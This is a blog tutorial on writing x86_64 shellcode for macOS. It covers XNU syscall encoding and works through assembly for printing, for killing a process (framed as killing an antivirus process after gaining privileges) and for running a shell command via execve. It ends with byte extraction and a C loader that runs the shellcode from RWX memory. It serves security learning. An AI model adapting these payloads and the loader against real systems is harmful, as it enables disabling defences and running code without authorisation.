macOS: Shellcoding on Apples (x86_64)
Introduction
This guide explores shellcoding on the x86_64 architecture for macOS, bypassing the traditional x86 starting point for a practical reason: with the release of macOS 10.15 (Catalina), Apple discontinued support for 32-bit applications entirely. Since x86_64 maintains backward compatibility with x86 code anyway, focusing on 64-bit shellcoding makes the most sense for modern macOS systems. Before diving in, you’ll need at least a basic understanding of assembly language—this isn’t an assembly tutorial, so if you’re unfamiliar with the fundamentals, take some time to learn them first and return when you’re ready for the challenge. Rather than immediately jumping into cryptic assembly instructions, this guide follows a practical workflow: start by writing code in C, identify the necessary system calls, and then translate everything into assembly. This approach leverages the wealth of existing C documentation and resources, making the process significantly more manageable. You’ll find countless examples of how to build network clients, manipulate processes, or execute commands in C, but you’d be hard-pressed to find someone talking about implementing these same tasks purely in assembly. Let’s start with our Blogpost.
You can find all the code on my github: https://github.com/Zeyad-Azima/macOShellcoding
Lab Setup
Let’s Setup our Lab and the required tools, Let’s list all the other tools we need.
- Homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
- Xcode:
We can download it from `AppStore`.
or: https://xcodereleases.com
- Xcode Command Line Tools (CLT)
xcode-select --install
- Nasm
brew install nasm
- Binutils (
ld)
brew install binutils
Before we go on straight to shellcoding, We need to understand some FUNDAMENTALS first we would be using to be able to write shellcodes. As we know the macos kernel (XNU) is a hybrid kernel which contains also BSD. We need to download the XNU source code. Cause we will use it for references in creating ours shellcodes and understanding syscalls on macOS. We can download it from here.
Now, We need to download the source code version that matches the macOS you writing the shellcode for. I am on macOS Sequoia and the version is macOS 15.5. You can use sw_vers command to check it.
~ % sw_vers
ProductName: macOS
ProductVersion: 15.5
BuildVersion: 24F74
Now, Let’s download the XNU VERSION FOR it.
When we scroll down more we can find it.
That’s the version (xnu-11417.121.6) of macOS 15.5.
XNU Syscall Classes
Now, Let’s open it with VSCode or your favorite IDE/CodeEditor.
All these files and folders for kernel we will use just some of it to understand the basics, But while we writing our shellcodes we would be navigating a lot through different files and folders. First Let’s go to osfmk/mach/i386/syscall_sw.h.
starting on line 135 till 152, That’s what matters of us. In here as we know and mentioned before that XNU is hybrid, So if you want to make execute a syscall for related to BSD you would need to define the entry to it.
#define SYSCALL_CLASS_SHIFT 24
#define SYSCALL_CLASS_MASK (0xFF << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK (~SYSCALL_CLASS_MASK)
......
#define SYSCALL_CLASS_NONE 0 /* Invalid */
#define SYSCALL_CLASS_MACH 1 /* Mach */
#define SYSCALL_CLASS_UNIX 2 /* Unix/BSD */
#define SYSCALL_CLASS_MDEP 3 /* Machine-dependent */
#define SYSCALL_CLASS_DIAG 4 /* Diagnostics */
#define SYSCALL_CLASS_IPC 5 /* Mach IPC */
In XNU (the kernel underlying macOS, iOS, etc.), system calls are not uniformly accessed via a single syscall table like in Linux. Instead, XNU uses syscall classes to route calls through different subsystems. Each system call class is associated with a unique number, which is shifted left by 24 bits (defined by SYSCALL_CLASS_SHIFT) to determine its class. So for every class to get the entry it will be as the following:
| Class | Name | Value | Shifted Base (<< 24) |
|
|---|---|---|---|---|
| 0 | SYSCALL_CLASS_NONE |
0 | 0x00000000 |
Invalid |
| 1 | SYSCALL_CLASS_MACH |
1 | 0x01000000 |
Mach traps |
| 2 | SYSCALL_CLASS_UNIX |
2 | 0x02000000 |
BSD syscalls |
| 3 | SYSCALL_CLASS_MDEP |
3 | 0x03000000 |
Machine-dependent |
| 4 | SYSCALL_CLASS_DIAG |
4 | 0x04000000 |
Diagnostics |
| 5 | SYSCALL_CLASS_IPC |
5 | 0x05000000 |
Mach IPC (newer) |
BSD = 0x02 « 24 = 0x02000000 → 0x2000000
The SYSCALL_CLASS_MASK and SYSCALL_NUMBER_MASK are used to extract the class and syscall number respectively. For example, a traditional BSD system call such as execve (system call number 59 or 0x3b in hex) in the SYSCALL_CLASS_UNIX (number 2) would be represented as 0x200003b when passed to the syscall assembly instruction.
; Assembly example to make a syscall with execve (BSD) in macOS
mov rax, 0x200003b ; Load the syscall number for execve (59 with class mask)
mov rdi, address ; Address of the command to execute
mov rsi, argv ; Pointer to an array of arguments
mov rdx, envp ; Pointer to an array of environment variables
syscall ; Make the system call
To make it clear, You’re dining in the XNU restaurant, a multi-level establishment where each floor represents a different system call class, and the kitchen routes your order based on a cleverly encoded ticket. The first floor, SYSCALL_CLASS_MACH (class 1), serves hearty main courses like task and thread operations, while the second floor, SYSCALL_CLASS_UNIX (class 2), specializes in classic BSD desserts such as execve and write. To order a medium-rare steak — item number 0x3B (59) on the Mach floor — you must tell the waiter 0x0100003B, calculated as (1 << 24) | 0x3B. Craving tiramisu (execve, also #59) from the BSD floor? Your order becomes 0x0200003B — same dish number, different floor, computed as (2 << 24) | 0x3B. Just like in XNU, never shout just “59” — the kitchen needs the full encoded number with the class shifted 24 bits left, ensuring your steak doesn’t arrive as a dessert (and vice versa). Bon appétit in the kernel!
x86_64 Calling Conventions and Registers
In the x86-64 System used by macOS, function arguments are passed via registers in this order: RDI holds the 1st argument, RSI the 2nd, RDX the 3rd (and sometimes the 2nd return value), RCX the 4th, R8 the 5th, and R9 the 6th. The return value (or syscall number) is placed in RAX, while RIP points to the next instruction, RSP manages the stack (and must be 16-byte aligned before any function call), RBP serves as the frame pointer for stack frames, and RBX acts as a general-purpose base register often preserved across calls. If a function requires more than six arguments, additional arguments are passed on the stack. It is essential to ensure that the RSP is properly aligned before making a function call. Despite system calls often working without strict alignment, adhering to this requirement is a good practice to avoid unexpected behavior. To illustrate how these registers are used in a function call, consider a function foo that takes three arguments.
; Assume arg1, arg2, and arg3 are already set with appropriate values
mov rax, syscall_number
mov rdi, arg1 ; 1st argument
mov rsi, arg2 ; 2nd argument
mov rdx, arg3 ; 3rd argument
syscall ; Execute syscall
Calling Conventions Table
You can use this table as a reference.
| Register | Usage |
|---|---|
RDI |
1st function argument |
RSI |
2nd function argument |
RDX |
3rd function argument (and optionally the 2nd return value) |
RCX |
4th function argument |
R8 |
5th function argument |
R9 |
6th function argument |
RAX |
Function return value/Syscall Number |
RIP |
Instruction pointer |
RSP |
Stack pointer (must be 16-byte aligned before calls) |
RBP |
Frame pointer |
RBX |
Base pointer (optional use) |
Shellcoding
Before writing our shellcode, To make it easy for ourselves instead of getting lost in all the assembly instructions, The best workflow to do is to write your code in C, then we convert it to assembly which will make it very easy for us, As there are references and resources for C it will make our process easier. For example, You would find people talking about how to make a client/server in C using socket. But, you won’t find someone(“insane”) talking about how to make a client/server in assembly. So The process would be as the following:
- Find
Cfunctions that we will need in our code. - Write our code in
C. - Turn our code into assembly.
- Which including getting our syscall numbers ready.
- Function arguments and types.
Let’s go ahead and start with something simple to make things clear.
Print ‘Hello’
We will start by printing Hello into the screen. So let’s apply our workflow. Usually when we want to print something in C, we use printf() function as the following:
#include <stdio.h>
int main() {
printf("Hello");
return 0;
}
Now, As we identified the functions we need which is printf(), And we wrote our code the 3rd step is to turn it into assembly. So the first thing we would need is to get the syscall number for printf(), We can find all the syscalls can be found in bsd/kern/syscalls.master.
But, the thing is we won’t find printf() in the file. Let’s investigate the printf() function source code. After investigation, the implementation of printf() involves calling other functions till we reach write syscall.
Call Chain: printf → write Syscall
| Step | Function Name |
|---|---|
| 1 | printf |
| 2 | vfprintf |
| 3 | __vfprintf_internal |
| 4 | Xprintf_buffer_write |
| 5 | _IO_new_file_overflow |
| 6 | _IO_do_write |
| 7 | new_do_write |
| 8 | _IO_SYSWRITE |
| 9 | __swrite (macOS only) |
| 10 | write (syscall) |
You can find the source code files here:
Also you could just have asked ChatGPT or something xD, But keep in mind with complicated shellcodes you would want to go through codes and else cause you always will learn something and upgrade yourself.
Now, When we search for write syscall we can see it in the syscalls.master file:
As we see the write syscall number is 4. And write takes 3 arguments. We need to learn about these argument and how to use it, Which simple can be done by searching it or go to the documentation:
So from the description we can know that we need to supply the string pointer to buf the second argument and number of bytes (length) to the third argument nbyte, And for fields/fd or File Descriptor, When we search it we will see that it takes the following values
0 (STDIN_FILENO): Represents standard input, typically connected to the keyboard or the input of a pipe.1 (STDOUT_FILENO): Represents standard output, typically connected to the display or the output of a pipe.2 (STDERR_FILENO): Represents standard error, typically connected to the display for error messages.
Our goal here is STDOUT which is value 1. So our syscall will be as the following:
int main() {
const char *message = "Hello";
write(1, message, 5);
}
Let’s start with writing our shellcode:
bits 64
global _main
_main:
mov rdi, 1 ; stdout for fd argument
mov rcx, 'Hello' ; put our string value into RCX
push rcx ; We push our string to the stack
mov rsi, rsp ; we supply the pointer to our string from RSP to RSI which is buf argument
mov rdx, 5 ; nbytes argument (our string length)
mov rax, 0x2000004 ; The BSD syscall class entry + syscall number
syscall ; invoke/execute syscall
Here our shellcode, starting with bits 64 to enforce x86-64 mode and global _main to export the Mach-O entry point. The first instruction mov rdi, 1 loads the file descriptor 1 (stdout) into RDI, the first argument register as we mentioned before. Next, mov rcx, 'Hello' encodes the 5-character string as a 64-bit immediate 0x6f6c6c6548 (little-endian: 'o','l','l','e','H') into RCX. The push rcx then writes these 8 bytes to the stack, placing 'H' at the new stack pointer and padding the remaining 3 bytes with zeros 0x00 to align the stack, Then mov rsi, rsp copies the current stack pointer into RSI, Which is the second argument, so it now points directly to the first character 'H', forming a valid char *buf. The mov rdx, 5 sets the third argument, which is the number of bytes to write and exactly matching the length of Hello. Finally, mov rax, 0x2000004 loads the XNU encoded syscall number: (SYSCALL_CLASS_UNIX << 24) | 4, where class 2 routes to the BSD subsystem and 4 selects the write entry from bsd/kern/syscalls.master. The syscall instruction triggers the kernel trap, dispatching through XNU’s unified handler to execute write(1, "Hello", 5), printing Hello to the terminal.
Let’s save our code into file hello.asm and compile our code.
- First we will turn the code to object file for
macho64architecture usingnasm:shellcoding % nasm -f macho64 hello.asm shellcoding % ls hello.asm hello.o
As we see we got our object file hello.o.
- Second, We will link the required libraries needed for the code to generate the executable using
ldshellcoding % ld -o hello hello.o -L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib -lSystem -platform_version macos 15.5 15.5 ld: warning: no platform load command found in 'hello.o', assuming: macOS shellcoding % ls hello hello.asm hello.o
Here we can see after linking we got our executable.
Note: The
-L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/libsets the library search path to the macOS 15.5 SDK’susr/libdirectory, ensuring the linker locates the correct version oflibSystem.tbd— Apple’s modern stub library format that resolves tolibSystem.dylibat runtime. The-lSystemflag explicitly links against libSystem, the foundational system library that exports thesyscallinterface,write,exit, and all BSD/POSIX functions; without it, thesyscallinstruction in our shellcode would remain unresolved, causing a linker error. Finally,-platform_version macos 15.5 15.5declares the minimum deployment target as macOS 15.5 (Sequoia), embedding theLC_VERSION_MIN_MACOSXload command and forcing the use of Sequoia-compatible API stubs and system call encodings — essential for forward and backward compatibility on modern Apple silicon and Intel systems.
- Let’s run and test our executable:
shellcoding % ./hello Hellozsh: segmentation fault ./hello
We see that our execution results in segmentation fault, And the reason for that the program doesn’t return or in simple words exit. For example, Within the main function in C, When return is used in the main function (e.g., return 0;), it typically translates to an exit_group system call (exit). This system call terminates the entire process and returns the specified exit status to the operating system. So, We need to exit after executing our write syscall.
Exit
We can exit using exit syscall, as we can see it in the syscalls.master file:
1 AUE_EXIT ALL { void exit(int rval) NO_SYSCALL_STUB; }
The syscall number is 1 and it takes only 1 integer argument rval which is the value to return. When we go to documentation the rval value can be 0 for EXIT_SUCCESS (successful execution of a program) or EXIT_FAILURE (unsuccessful execution of a program). Let’s update our shellcode and add exit syscall
bits 64
global _main
_main:
mov rdi, 1 ; stdout for fd argument
mov rcx, 'Hello' ; put our string value into RCX
push rcx ; We push our string to the stack
mov rsi, rsp ; we supply the pointer to our string from RSP to RSI which is buf argument
mov rdx, 5 ; nbytes argument (our string length)
mov rax, 0x2000004 ; The BSD syscall class entry + write syscall number
syscall ; invoke/execute syscall
mov rax, 0x2000001 ; The BSD syscall class entry + exit syscall
mov rdi, 0 ; arg int rval
syscall ; invoke/execute syscall
Now, let’s repeat the process of compiling to get our executable again and test it.
shellcoding % nasm -f macho64 hello.asm
shellcoding % ld -o hello hello.o -L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib -lSystem -platform_version macOS 15.5 15.5
ld: warning: no platform load command found in '/Users/zeyadazima.com/shellcoding/hello.o', assuming: macOS
shellcoding % ./hello
Hello%
shellcoding %
As we see clearly our code worked perfectly.
Kill a Process
Let’s do another shellcode, And take a scenario in case we found a way to execute a code with high privileges and We need to write a shellcode to kill the AV process.
The C code to kill a process is as the following:
#include <stdio.h>
#include <signal.h>
#include <sys/types.h> // For pid_t
#include <unistd.h> // For getpid() (optional, for self-killing example)
int main() {
pid_t target_pid;
target_pid = 12345;
// Sending SIGTERM (graceful termination)
kill(target_pid, SIGTERM);
return 0;
}
We can see here we used kill function and supply the PID and the signal which is SIGTERM.
Now, If we search for kill in syscalls.master. We can find it:
37 AUE_KILL ALL { int kill(int pid, int signum, int posix) NO_SYSCALL_STUB; }
For the PID we will create a test process and get it’s PID to supply it for the first argument and for the signum argument, In the C code the value is SIGTERM which it will be a pre-defined value in the source code, We can search for #define SIGTERM in the XNU source code, We will find it at xnu-xnu-11417.121.6/bsd/sys/signal.h:103:
#define SIGKILL 9 /* kill (cannot be caught or ignored) */
#define SIGBUS 10 /* bus error */
#define SIGSEGV 11 /* segmentation violation */
#define SIGSYS 12 /* bad argument to system call */
#define SIGPIPE 13 /* write on a pipe with no one to read it */
#define SIGALRM 14 /* alarm clock */
#define SIGTERM 15 /* software termination signal from kill */
#define SIGURG 16 /* urgent condition on IO channel */
#define SIGSTOP 17 /* sendable stop signal not from tty */
So we can see that SIGTERM value is 15, But the better option to use SIGKILL with value 9 as it will be forced and kill (cannot be caught or ignored). We will supply 9 as the second argument. Now, In the C code it doesn’t have a 3rd argument as we see for the syscall. If we search for int posix in the XNU source code, We gonna find the following code under xnu-xnu-11417.121.6/bsd/kern/kern_sig.c:1373:
int
kill(proc_t cp, struct kill_args *uap, __unused int32_t *retval)
{
proc_t p;
kauth_cred_t uc = kauth_cred_get();
int posix = uap->posix; /* !0 if posix behaviour desired */
AUDIT_ARG(pid, uap->pid);
AUDIT_ARG(signum, uap->signum);
if ((u_int)uap->signum >= NSIG) {
return EINVAL;
}
We can see from apple comment on the source code that, if we want POSIX behaviour in killing the process we have to supply anything other than 0. And after more searching and asking diff AI chatbots i got the following:
| Value | Meaning |
|---|---|
posix = 0 |
Mach (legacy) signal behavior |
posix = 1 (or any !0) |
POSIX/BSD signal behavior |
Note: usually when you see extra arguments that was not mentioned or supplyed in the
Ccode, It means that the argument is optional and not really required so you always can supply0orNULLas a value to the optional/non-required arguments. Let’s run our test process using a simple infinity loop running in background:
shellcoding % while true; do sleep 10; done &
[2] 27646
shellcoding % ps -p 27646
PID TTY TIME CMD
27646 ttys061 0:00.01 -zsh
the PID is 27646
Now, Lets write our shellcode:
bits 64
global _main
_main:
mov rdi, 27646 ; 1st argument PID
mov rsi, 9 ; 2nd argument signum
mov rdx, 0 ; 3rd argument posix
mov rax, 0x2000025 ; The BSD syscall class entry + 0x25 (which is 37 in hex) kill syscall
syscall
mov rax, 0x2000001 ; The BSD syscall class entry + exit syscall
mov rdi, 0 ; arg int rval
syscall ; invoke/execute syscall
It’s already clear here, We passed our arguments as the following; PID for RDI, then signum for RSI and After that, posix to RDX and setup our syscall. Finally, We exit gracefully using exit syscall.
shellcoding % nasm -f macho64 killer.asm
shellcoding % ld -o killer killer.o -L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib -lSystem -platform_version macOS 15.5 15.5
ld: warning: no platform load command found in '/Users/zeyadazima.com/shellcoding/killer.o', assuming: macOS
shellcoding % ./killer
shellcoding %
[2] - killed while true; do; sleep 10; done
shellcoding % ps -p 27646
PID TTY TIME CMD
As we can see clearly, The process has been killed successfully.
Execute Command
Now, The exciting parts where we need to execute commands. Let’s bring our C code to execute commands on the system. Which is usually in C it’s done through system() function. But remember that on the XNU has BSD. So Let’s search for C code where execute commands using BSD functions.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
int main() {
pid_t pid;
char *const argv[] = {"/bin/ls", "-l", NULL}; // Command and its arguments
char *const envp[] = {NULL}; // Environment variables (can be customized)
execve(argv[0], argv, envp);
return 0;
}
As we can see here it uses execv() function and it takes 3 arguments. lET’S SEARCH FOR it in the syscalls.master:
59 AUE_EXECVE ALL { int execve(char *fname, char **argp, char **envp) NO_SYSCALL_STUB; }
So it takes a pointer to the fname which is the file name, then pointer to array argp and pointer to another array envp.
We can see that in the description of execve(), the first argument is the path to the binary we want to execute which is gonna be the shell in this case /bin/zsh. Then for the second argument it takes array the arguments of the executable or program we passing and the first element in the array has to be the same file name /bin/zsh, So the array will be as the following, if we want to executeecho "W00tW00t" > /tmp/Pwned.txt command {"/bin/zsh","-c","echo 'W00tW00t' > /tmp/Pwned.txt"}. The third argument as mentioned is optional so we can supply a pointer to NULL array.
Let’s go on and write our shellcode:
bits 64
global _main
_main:
mov rcx, 0 ; NULL Terminator
push rcx ; push the NULL Terminator to the stack
mov rdx, '/bin/zsh' ; our file/executable name
push rdx ; push the file/executable name to the stack
mov rdi, rsp ; fname => 1st argument which by Copy the RSP address to RDI which is the pointer to our file/executable name
mov rbx, '-c' ; argp[1] => the 2nd element in the arguments array
push rbx ; push argp[1] to the stack
mov rbx, rsp ; save the argp[1]('-c') pointer to RBX
push rcx ; push the NULL Terminator to the stack
Let’s stop here for a while, We need to place our 3rd element which is our command echo "W00tW00t" > /tmp/Pwned.txt, Which is for a string to long and to divide it to push it on the stack will not be the best thing our shellcode will be so long. Instead we gonna use a trick to place it on the stack for example:
call array
db 'echo "W00tW00t" > /tmp/Pwned.txt', 0
call pushes the address of the following db string onto the stack. Which will make it easier for us.
bits 64
global _main
_main:
xor rcx, rcx ; NULL Terminator
push rcx ; push the NULL Terminator to the stack
mov rdx, '/bin/zsh' ; our file/executable name
push rdx ; push the file/executable name to the stack
mov rdi, rsp ; fname => 1st argument which by Copy the RSP address to RDI which is the pointer to our file/executable name
mov rbx, '-c' ; argp[1] => the 2nd element in the arguments array
push rbx ; push argp[1] to the stack
mov rbx, rsp ; save the argp[1]('-c') pointer to RBX
push rcx ; push the NULL Terminator to the stack
; classic position-independent trick
call array ; call the array label to setup the array for argp
db 'echo "W00tW00t" > /tmp/Pwned.txt', 0 ; arg[2] which is our command and including the NULL Terminator
Now, We need to make array label where it will setup the array elements and execute the execve syscall and then exit.
bits 64
global _main
_main:
xor rcx, rcx ; NULL Terminator
push rcx ; push the NULL Terminator to the stack
mov rdx, '/bin/zsh' ; our file/executable name
push rdx ; push the file/executable name to the stack
mov rdi, rsp ; fname => 1st argument which by Copy the RSP address to RDI which is the pointer to our file/executable name
mov rbx, '-c' ; argp[1] => the 2nd element in the arguments array
push rbx ; push argp[1] to the stack
mov rbx, rsp ; save the argp[1]('-c') pointer to RBX
push rcx ; push the NULL Terminator to the stack
call array ; call the array label to setup the array for argp
db 'echo "W00tW00t" > /tmp/Pwned.txt', 0 ; arg[2] which is our command and including the NULL Terminator
array:
push rbx ; arg[1] put the -c pointer into the array
push rdi ; args[0] which is fname saved before
mov rsi, rsp ; pass the array pointer for RSI which holds the second argument
xor rdx, rdx ; empty rdx to use as NULL for the third argument envp
mov rax, 0x200003B ; The BSD syscall class entry + 0x3B (which is 59 in hex) kill syscall
syscall ; invoke/execute syscall
mov rax, 0x2000001 ; The BSD syscall class entry + exit syscall
mov rdi, 0 ; arg int rval
syscall ; invoke/execute syscall
Here our shellcode, first zeroes RCX with xor rcx, rcx and push rcx to place an 8-byte NULL on the stack which will be reused as padding and as a NULL terminator. Next mov rdx, '/bin/zsh' loads the bytes for the filename into RDX and push rdx writes those 8 bytes to the stack so that RSP now points at the "/bin/zsh" string. mov rdi, rsp copies that stack pointer into RDI, which is the first argument to execve (the filename pointer).After that load '-c' into RBX and push rbx, creating the "-c" string on the stack; mov rbx, rsp saves the pointer to the "-c" string in RBX for later. Another push rcx places a NULL on the stack. The call array instruction is the classic position-independent trick, it pushes the address of the immediately following db bytes (the command string) onto the stack and then jumps to the array label, so the command string’s runtime address is already on the stack when array executes. The db 'echo "W00tW00t" > /tmp/Pwned.txt', 0 provides the NUL-terminated command that zsh -c will execute. Then, At array label we will build the argp array by push rbx (push pointer to "-c") and push rdi (push pointer to "/bin/zsh"), then mov rsi, rsp sets RSI to point at that array so execve receives argp correctly. Following xor rdx, rdx sets RDX = 0 so envp is NULL. mov rax, 0x200003B loads the BSD syscall number for execve.
Note:
0x3B= 59 decimal →execve
And syscall invokes the kernel to execute execve(filename, argv, envp). If execve returns (i.e., it failed) the code falls through to mov rax, 0x2000001 / mov rdi, 0 / syscall which calls the exit syscall to terminate the process.
shellcoding % nasm -f macho64 execute.asm
shellcoding % ld -o execute execute.o -L /Library/Developer/CommandLineTools/SDKs/MacOSX15.5.sdk/usr/lib -lSystem -platform_version macOS 15.5 15.5
ld: warning: no platform load command found in '/Users/zeyadazima.com/shellcoding/execute.o', assuming: macOS
shellcoding % ls /tmp
node-compile-cache OSL_PIPE_501_SingleOfficeIPC powerlog
shellcoding % ./execute
shellcoding % ls /tmp
node-compile-cache OSL_PIPE_501_SingleOfficeIPC powerlog Pwned.txt
/tmp % cat Pwned.txt
W00tW00t
We can see clearly, That our shellcode is executed successfully and our file created.
Extract Shellcode
Now, Let’s extract our shellcode from the object file, So if we need to send it with our exploit. We will use objdump tool and will show also how to do it with otool.
objdump
shellcoding% objdump --disassemble --x86-asm-syntax=intel ~/shellcoding/execute.o
execute.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <_main>:
0: 48 31 c9 xor rcx, rcx
3: 51 push rcx
4: 48 ba 2f 62 69 6e 2f 7a 73 68 movabs rdx, 0x68737a2f6e69622f
e: 52 push rdx
f: 48 89 e7 mov rdi, rsp
12: bb 2d 63 00 00 mov ebx, 0x632d
17: 53 push rbx
18: 48 89 e3 mov rbx, rsp
1b: 51 push rcx
1c: e8 21 00 00 00 call 0x42 <array>
21: 65 63 68 6f movsxd ebp, dword ptr gs:[rax + 0x6f]
25: 20 22 and byte ptr [rdx], ah
27: 57 push rdi
28: 30 30 xor byte ptr [rax], dh
2a: 74 57 je 0x83 <array+0x41>
2c: 30 30 xor byte ptr [rax], dh
2e: 74 22 je 0x52 <array+0x10>
30: 20 3e and byte ptr [rsi], bh
32: 20 2f and byte ptr [rdi], ch
34: 74 6d je 0xa3 <array+0x61>
36: 70 2f jo 0x67 <array+0x25>
38: 50 push rax
39: 77 6e ja 0xa9 <array+0x67>
3b: 65 64 2e 74 78 je 0xb8 <array+0x76>
40: 74 00 je 0x42 <array>
0000000000000042 <array>:
42: 53 push rbx
43: 57 push rdi
44: 48 89 e6 mov rsi, rsp
47: 48 31 d2 xor rdx, rdx
4a: b8 3b 00 00 02 mov eax, 0x200003b
4f: 0f 05 syscall
51: b8 01 00 00 02 mov eax, 0x2000001
56: bf 00 00 00 00 mov edi, 0x0
5b: 0f 05 syscall
- Here we can see our dissassembled code clearly and the array, etc. We need to save this into file
objdump --disassemble --x86-asm-syntax=intel ~/shellcoding/execute.o > execute.disasm
- Now, Let’s extract the hex bytes from the
execute.disasmfile. Using command line utilities.
shellcoding% grep -E '^[[:space:]]+[0-9a-f]+:' execute.disasm \
| awk '{for(i=2;i<=NF;i++) if ($i ~ /^[0-9a-f]{2}$/) printf "%s", $i}' \
| tr -d '\n' > shellcode.hex
shellcoding% cat shellcode.hex
4831c95148ba2f62696e2f7a7368524889e7bb2d630000534889e351e8210000006563686f2022573030745730307422203e202f746d702f50776e65642e7478740053574889e64831d2b83b0000020f05b801000002bf000000000f05
- Convert it to binary
shellcoding% xxd -r -p shellcode.hex > shellcode.bin
- Let’s Check the Shellcode size
shellcoding% wc -c shellcode.bin
93 shellcode.bin // 93 bytes
- Generate
Carray of bytes for the shellcode
shellcoding% xxd -i shellcode.bin > shellcode.h
shellcoding% cat shellcode.h
unsigned char shellcode_bin[] = {
0x48, 0x31, 0xc9, 0x51, 0x48, 0xba, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x7a,
0x73, 0x68, 0x52, 0x48, 0x89, 0xe7, 0xbb, 0x2d, 0x63, 0x00, 0x00, 0x53,
0x48, 0x89, 0xe3, 0x51, 0xe8, 0x21, 0x00, 0x00, 0x00, 0x65, 0x63, 0x68,
0x6f, 0x20, 0x22, 0x57, 0x30, 0x30, 0x74, 0x57, 0x30, 0x30, 0x74, 0x22,
0x20, 0x3e, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x50, 0x77, 0x6e, 0x65,
0x64, 0x2e, 0x74, 0x78, 0x74, 0x00, 0x53, 0x57, 0x48, 0x89, 0xe6, 0x48,
0x31, 0xd2, 0xb8, 0x3b, 0x00, 0x00, 0x02, 0x0f, 0x05, 0xb8, 0x01, 0x00,
0x00, 0x02, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x05
};
unsigned int shellcode_bin_len = 93;
otool
- Extract Raw Section Bytes
shellcoding% otool -s __TEXT __text ~/shellcoding/execute.o \
| sed -n '3,$p' \
| awk '{ for(i=2;i<=NF;i++) printf "%s",$i } END{ print "" }' > shellcode_otool.hex
shellcoding% cat shellcode_otool.hex
4831c95148ba2f62696e2f7a7368524889e7bb2d630000534889e351e8210000006563686f2022573030745730307422203e202f746d702f50776e65642e7478740053574889e64831d2b83b0000020f05b801000002bf000000000f05
- Convert to binary
xxd
shellcoding% xxd -r -p shellcode_otool.hex > shellcode_otool.bin
- Check shellcode length
Shellcoding% wc -c shellcode_otool.bin
93 shellcode_otool.bin
- Convert it to
Carray
Shellcoding% cat shellcode_otool.h
unsigned char shellcode_otool_bin[] = {
0x48, 0x31, 0xc9, 0x51, 0x48, 0xba, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x7a,
0x73, 0x68, 0x52, 0x48, 0x89, 0xe7, 0xbb, 0x2d, 0x63, 0x00, 0x00, 0x53,
0x48, 0x89, 0xe3, 0x51, 0xe8, 0x21, 0x00, 0x00, 0x00, 0x65, 0x63, 0x68,
0x6f, 0x20, 0x22, 0x57, 0x30, 0x30, 0x74, 0x57, 0x30, 0x30, 0x74, 0x22,
0x20, 0x3e, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x50, 0x77, 0x6e, 0x65,
0x64, 0x2e, 0x74, 0x78, 0x74, 0x00, 0x53, 0x57, 0x48, 0x89, 0xe6, 0x48,
0x31, 0xd2, 0xb8, 0x3b, 0x00, 0x00, 0x02, 0x0f, 0x05, 0xb8, 0x01, 0x00,
0x00, 0x02, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x05
};
unsigned int shellcode_otool_bin_len = 93;
Test Shellcode with Loader
Now, Let’s write a loader in C to try and execute our shellcode.
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/wait.h>
#include <stdlib.h>
int main(void) {
unsigned char code[] = {
0x48, 0x31, 0xc9, 0x51, 0x48, 0xba, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x7a,
0x73, 0x68, 0x52, 0x48, 0x89, 0xe7, 0xbb, 0x2d, 0x63, 0x00, 0x00, 0x53,
0x48, 0x89, 0xe3, 0x51, 0xe8, 0x21, 0x00, 0x00, 0x00, 0x65, 0x63, 0x68,
0x6f, 0x20, 0x22, 0x57, 0x30, 0x30, 0x74, 0x57, 0x30, 0x30, 0x74, 0x22,
0x20, 0x3e, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x50, 0x77, 0x6e, 0x65,
0x64, 0x2e, 0x74, 0x78, 0x74, 0x00, 0x53, 0x57, 0x48, 0x89, 0xe6, 0x48,
0x31, 0xd2, 0xb8, 0x3b, 0x00, 0x00, 0x02, 0x0f, 0x05, 0xb8, 0x01, 0x00,
0x00, 0x02, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x05
};
size_t len = sizeof(code);
pid_t pid = fork();
if (pid < 0) {
perror("fork");
return 1;
}
if (pid == 0) {
// child: allocate RWX, copy shellcode and execute
void *exec = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_PRIVATE, -1, 0);
if (exec == MAP_FAILED) {
perror("mmap");
_exit(127);
}
memcpy(exec, code, len);
// print from child so you can see it if child doesn't get replaced
printf("[child %d] executing shellcode (%zu bytes)...\n", getpid(), len);
fflush(stdout);
int (*func)() = (int(*)())exec;
int r = func(); // if shellcode calls execve, child will be replaced
// If returned, report and exit child
printf("[child %d] shellcode returned %d\n", getpid(), r);
fflush(stdout);
_exit(r & 0xFF);
} else {
// parent: wait for child and then check side-effect
int status = 0;
printf("[parent %d] spawned child %d, waiting...\n", getpid(), pid);
fflush(stdout);
if (waitpid(pid, &status, 0) == -1) {
perror("waitpid");
return 2;
}
if (WIFEXITED(status)) {
printf("[parent] child exited with status %d\n", WEXITSTATUS(status));
} else if (WIFSIGNALED(status)) {
printf("[parent] child killed by signal %d\n", WTERMSIG(status));
} else {
printf("[parent] child ended with status 0x%x\n", status);
}
// small sleep to allow any async side-effects to settle
usleep(200000);
const char *check_path = "/tmp/Pwned.txt";
if (access(check_path, F_OK) == 0) {
printf("[parent] Success: '%s' exists.\n", check_path);
return 0;
} else {
printf("[parent] Failure: '%s' not found (errno=%d: %s)\n",
check_path, errno, strerror(errno));
return 3;
}
}
}
